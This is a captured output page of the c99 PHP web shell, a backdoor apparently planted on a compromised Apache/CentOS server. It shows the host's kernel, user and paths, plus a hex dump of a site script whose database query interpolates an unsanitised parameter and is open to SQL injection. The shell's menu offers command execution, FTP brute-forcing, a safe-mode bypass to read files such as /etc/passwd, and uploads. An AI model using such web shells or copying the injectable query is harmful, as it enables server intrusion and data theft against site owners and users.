!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/webboard/   drwxr-xr-x
Free 52.37 GB of 127.8 GB (40.98%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showimage.php (403 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/manage_22222/webboard/showimage.php
Size 403 B
MD5 08e5cf7202d354d0aee97a01a9b75554
Owner/Group root/root
Perms-rw-r--r--
Create time 06/07/2011 01:44:26
Access time 30/07/2024 17:22:12
MODIFY time 21/08/2009 09:46:56

FULL HEXDUMP
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
3C 3F 0D 0A 20 0D 0A 09 69 6E 63 6C 75 64 65 28 22 63 6F 6E 66 69 67 2E
69 6E 63 2E 70 68 70 22 29 3B 0D 0A 09 0D 0A 2F 2F 24 74 61 62 6C 65 3D
61 6E 73 3B 0D 0A 2F 2F 24 51 75 65 73 74 69 6F 6E 4E 6F 20 3D 27 32 27
3B 0D 0A 09 2F 2F 20 B5 D4 B4 B5 E8 CD 20 64 61 74 61 62 61 73 65 20 E0
BE D7 E8 CD CD E8 D2 B9 A2 E9 CD C1 D9 C5 0D 0A 09 6D 79 73 71 6C 5F 63
6F 6E 6E 65 63 74 28 24 68 6F 73 74 2C 24 75 73 65 72 2C 24 70 61 73 73
77 64 29 3B 0D 0A 09 24 4E 6F 20 3D 20 24 73 71 6C 20 3D 20 22 73 65 6C
65 63 74 20 6E 70 68 6F 74 6F 20 66 72 6F 6D 20 77 65 62 62 6F 61 72 64
5F 24 74 61 62 6C 65 20 77 68 65 72 65 20 4E 6F 3D 27 24 4E 6F 27 20 22
3B 0D 0A 09 24 72 65 73 75 6C 74 20 3D 20 6D 79 73 71 6C 5F 64 62 5F 71
75 65 72 79 28 24 64 62 6E 61 6D 65 2C 24 73 71 6C 29 3B 0D 0A 09 24 72
6F 77 20 3D 20 6D 79 73 71 6C 5F 66 65 74 63 68 5F 72 6F 77 28 24 72 65
73 75 6C 74 29 3B 0D 0A 0D 0A 09 2F 2F 20 A1 D3 CB B9 B4 20 48 65 61 64
65 72 20 E0 BB E7 B9 20 47 49 46 0D 0A 09 2F 2F 68 65 61 64 65 72 28 22
43 6F 6E 74 65 6E 74 2D 74 79 70 65 3A 20 69 6D 61 67 65 2F 67 69 66 22
29 3B 0D 0A 0D 0A 09 2F 2F 20 E1 CA B4 A7 C0 D2 BE 0D 0A 09 65 63 68 6F
20 24 72 6F 77 5B 30 5D 3B 0D 0A 0D 0A 0D 0A 3F 3E 0D 0A
<?      include("config.
inc.php");     //$table=
ans;  //$QuestionNo ='2'
;   // ติดต่อ database เ
พื่ออ่านข้อมูล   mysql_c
onnect($host,$user,$pass
wd);   $No = $sql = "sel
ect nphoto from webboard
_$table where No='$No' "
;   $result = mysql_db_q
uery($dbname,$sql);   $r
ow = mysql_fetch_row($re
sult);     // กำหนด Head
er เป็น GIF   //header("
Content-type: image/gif"
);     // แสดงภาพ   echo
 $row[0];      ?>  

HEXDUMP: [Full] [Preview]
Base64:
[Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0071 ]--